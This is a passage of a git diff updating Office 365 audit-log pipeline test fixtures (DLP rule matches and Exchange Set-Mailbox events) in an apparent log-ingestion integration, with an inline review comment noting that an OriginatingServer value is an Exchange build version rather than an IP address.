Body\",\"SensitiveType\":\"b8fe86d1-c056-453b-bfaa-9fe698699ecc\",\"UniqueCount\":1}]},\"RuleId\":\"8398c03a-a00d-42bb-8f80-ead0ad04e1df\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected test\",\"Severity\":\"Low\"}]}],\"RecordType\":13,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Company-Internal-Financial.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://example.net/testsiem2.onmicrosoft.com/sharepoint\",\"From\":\"alice@testsiem2.onmicrosoft.com\",\"LastModifiedTime\":\"2020-02-24T12:13:14Z\",\"UniqueID\":\"8e103f2f-b293-4062-38b8-08d7b965b2fa\",\"itemCreationTime\":\"2020-02-20T11:23:45\"},\"UserId\":\"DlpAgent\",\"UserKey\":\"1153801116545789462\",\"UserType\":4,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ComplianceDLPExchange", "provider": "Exchange", 
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json
index ab2331e730c..6c0abb8d322 100644
--- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-dlp-sharepoint-events.json-expected.json
@@ -84,7 +84,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-17T07:32:49.934357600Z", + "ingested": "2021-12-09T13:42:29.971752Z", "original": "{\"CreationTime\":\"2020-02-25T16:20:15\",\"Id\":\"a21f13b9-22b6-405b-bf9e-a07ad8d456da\",\"IncidentId\":\"3066c3c5-eb56-dd03-b000-08d7ba115afd\",\"ObjectId\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[],\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"c5981414-9f1f-4275-a2df-2fbfb1d03795\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected U.S. Financial\",\"Severity\":\"Low\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T15:22:49\",\"ItemLastModifiedTime\":\"2020-02-25T16:19:43\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", 
@@ -198,7 +198,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934369600Z", + "ingested": "2021-12-09T13:42:29.971758400Z", "original": "{\"CreationTime\":\"2020-02-25T16:23:39\",\"Id\":\"eb8259c8-d2c2-449d-bd35-5c8a033eb629\",\"IncidentId\":\"eeeb7b44-fc69-c19f-b000-08d7ba115afd\",\"ObjectId\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"7503b92a-67c2-494b-8a46-57ef0d738886\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected U.S. 
Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data Copy.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T16:21:50\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", 
@@ -308,7 +308,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-17T07:32:49.934372800Z", + "ingested": "2021-12-09T13:42:29.971764Z", "original": "{\"CreationTime\":\"2020-02-25T16:23:39\",\"Id\":\"50a90c83-7e15-4679-8778-d9dd30927e66\",\"IncidentId\":\"eeeb7b44-fc69-c19f-b000-08d7ba115afd\",\"ObjectId\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[],\"Actions\":[\"NotifyUser\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"c5981414-9f1f-4275-a2df-2fbfb1d03795\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected U.S. Financial\",\"Severity\":\"Low\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data Copy.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data%20Copy.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T16:21:50\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"856386d5-c9cd-46e9-b53b-fd01ed590b68\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", 
@@ -422,7 +422,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934375600Z", + "ingested": "2021-12-09T13:42:29.971777700Z", "original": "{\"CreationTime\":\"2020-02-25T16:22:22\",\"Id\":\"59652f9a-087c-4b65-b88c-b293ade34202\",\"IncidentId\":\"3066c3c5-eb56-dd03-b000-08d7ba115afd\",\"ObjectId\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"a15b4790-085f-43c1-90ad-853b16cedeec\",\"PolicyName\":\"U.S. Financial Data\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":12,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":75,\"Count\":1,\"SensitiveType\":\"cb353f78-2b72-4c3c-8827-92ebe4f69fdf\"}]},\"RuleId\":\"7503b92a-67c2-494b-8a46-57ef0d738886\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected U.S. 
Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Customers Financial Data.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/Customers%20Financial%20Data.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-25T15:22:49\",\"ItemLastModifiedTime\":\"2020-02-25T16:21:44\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"9cc7be1c-dd5a-4895-b7cb-757de6d51b42\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": "ComplianceDLPSharePoint", "provider": "OneDrive", 
@@ -536,7 +536,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934378200Z", + "ingested": "2021-12-09T13:42:29.971782400Z", "original": "{\"CreationTime\":\"2020-02-26T10:13:48\",\"Id\":\"d69c6758-f210-43bd-bac1-563adef4b4cf\",\"IncidentId\":\"f7295114-e601-f2b6-8800-08d7baa56f8b\",\"ObjectId\":\"f026407b-090a-4c15-99b5-09851842d96d\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateIncidentReport:SiteAdmin\"],\"Actions\":[\"BlockAccess\",\"NotifyUser\",\"GenerateIncidentReport\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":23,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"bc4d376f-b038-4695-9362-609d32f963cf\",\"RuleMode\":\"Enable\",\"RuleName\":\"High volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"INTERNAL CREDIT CARD NUMBERS.docx\",\"FileOwner\":\"Alan Smithee\",\"FilePathUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com/Documents/INTERNAL%20CREDIT%20CARD%20NUMBERS.docx\",\"From\":\"ASR@TESTSIEM2.ONMICROSOFT.COM\",\"ItemCreationTime\":\"2020-02-26T09:44:40\",\"ItemLastModifiedTime\":\"2020-02-26T09:46:23\",\"SiteCollectionGuid\":\"eae3edad-a192-43a9-b317-98d7ea5e3939\",\"SiteCollectionUrl\":\"https://testsiem2-my.sharepoint.com/personal/asr_testsiem2_onmicrosoft_com\",\"UniqueID\":\"f026407b-090a-4c15-99b5-09851842d96d\"},\"UserId\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserKey\":\"DlpPolicyEventBasedAssistantOneDriveForBusiness\",\"UserType\":4,\"Version\":1,\"Workload\":\"OneDrive\"}", "code": 
"ComplianceDLPSharePoint", "provider": "OneDrive", @@ -650,7 +650,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934380600Z", + "ingested": "2021-12-09T13:42:29.971787300Z", "original": "{\"CreationTime\":\"2020-02-26T12:39:40\",\"Id\":\"93585ace-96eb-4af1-fdb2-08d7bab8f2bd\",\"IncidentId\":\"0ae82be2-e321-ab52-d000-08d7bab8fe55\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateAlert:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"NotifyUser\",\"GenerateAlert\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":2,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Document.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx\",\"FileSize\":35920,\"From\":\"alice@testsiem2.onmicrosoft.com\",\"IsViewableByExternalUsers\":false,\"ItemCreationTime\":\"2020-02-26T09:55:38\",\"ItemLastModifiedTime\":\"2020-02-26T09:56:12\",\"SiteCollectionGuid\":\"4aaa3319-df17-4ea0-a142-42cf204cfc62\",\"SiteCollectionUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications\",\"UniqueID\":\"3ace820e-9358-4520-9df6-5bd65602cef0\"},\"UserId\":\"DLPAgent\",\"UserKey\":\"DLPAgent\",\"UserType\":4,\"Version\":1,\"Workload\":\"SharePoint\"}", "code": "ComplianceDLPSharePoint", "provider": "SharePoint", 
@@ -764,7 +764,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-17T07:32:49.934383Z", + "ingested": "2021-12-09T13:42:29.971792700Z", "original": "{\"CreationTime\":\"2020-02-26T12:39:40\",\"Id\":\"93585ace-96eb-4af1-fdb2-08d7bab8f2bd\",\"IncidentId\":\"0ae82be2-e321-ab52-d000-08d7bab8fe55\",\"Operation\":\"DLPRuleMatch\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"PolicyDetails\":[{\"PolicyId\":\"08745d02-5d45-48bd-98e1-8199ab1efdbe\",\"PolicyName\":\"Financial Data Detection\",\"Rules\":[{\"ActionParameters\":[\"GenerateAlert:asr@testsiem2.onmicrosoft.com\"],\"Actions\":[\"NotifyUser\",\"GenerateAlert\"],\"ConditionsMatched\":{\"SensitiveInformation\":[{\"Confidence\":85,\"Count\":42,\"SensitiveType\":\"50842eb7-edc8-4019-85dd-5a5c1f2bb085\"},{\"Confidence\":85,\"Count\":2,\"SensitiveType\":\"0e9b3178-9678-47dd-a509-37222ca96b42\"}]},\"RuleId\":\"121c85c3-b2b2-4d5b-af11-b1d1bc0b36fd\",\"RuleMode\":\"Enable\",\"RuleName\":\"Low volume of content detected France Financial\",\"Severity\":\"High\"}]}],\"RecordType\":11,\"SensitiveInfoDetectionIsIncluded\":false,\"SharePointMetaData\":{\"FileName\":\"Document.docx\",\"FileOwner\":\"alice@testsiem2.onmicrosoft.com\",\"FilePathUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications/Shared%20Documents/Document.docx\",\"FileSize\":35920,\"From\":\"alice@testsiem2.onmicrosoft.com\",\"IsViewableByExternalUsers\":false,\"ItemCreationTime\":\"2020-02-26T09:55:38\",\"ItemLastModifiedTime\":\"2020-02-26T09:56:12\",\"SiteCollectionGuid\":\"4aaa3319-df17-4ea0-a142-42cf204cfc62\",\"SiteCollectionUrl\":\"https://testsiem2.sharepoint.com/sites/Internalcommunications\",\"UniqueID\":\"3ace820e-9358-4520-9df6-5bd65602cef0\"},\"UserId\":\"DLPAgent\",\"UserKey\":\"DLPAgent\",\"UserType\":4,\"Version\":1,\"Workload\":\"SharePoint\"}", "code": "ComplianceDLPSharePoint", "provider": "SharePoint", 
diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json
index 0c402fadb96..66a77fd7ffa 100644
--- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-admin-events.json
@@ -2,7 +2,7 @@
 "events": [
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT 
AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -14,7 +14,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "DomainController",
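Review bot: The value replaced on the `+ "OriginatingServer"` line, `HE1PR0102MB3228 (15.20.207.17)`, does not appear to be an IP address at all: in Exchange Online admin audit records this field is the server name followed by the Exchange build version, and 15.20.x.y is that version line, so it was very likely caught by an IP-shaped pattern rather than being a real public address. Swapping it for `67.43.156.13` makes the fixture misrepresent the field, and if the audit pipeline ever parses the parenthesised token as an address or feeds it to GeoIP, the test would pass on a value real events never carry. Suggest restoring `"OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",` here and the matching `\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\"` inside the `event.original` string of the `@@ -2,7` hunk, with a short note in the PR that this field holds a version, not an address. This reading is inferred from the Exchange record format, not from anything visible in the hunk, so it is worth confirming against a real Set-Mailbox audit record before reverting.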
@@ -36,7 +36,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6c3454e1-1a13-411b-bed1-08d7adfc0c09\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -48,7 +48,7 @@ "Operation": "Set-Mailbox", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "OrganizationName": "testsiem.onmicrosoft.com", - "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", + "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)", "Parameters": [ { "Name": "RecoverableItemsQuota", 
@@ -122,7 +122,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:03\",\"ExternalAccess\":true,\"Id\":\"b5131b23-3efb-481a-c05b-08d7ac0f2a82\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
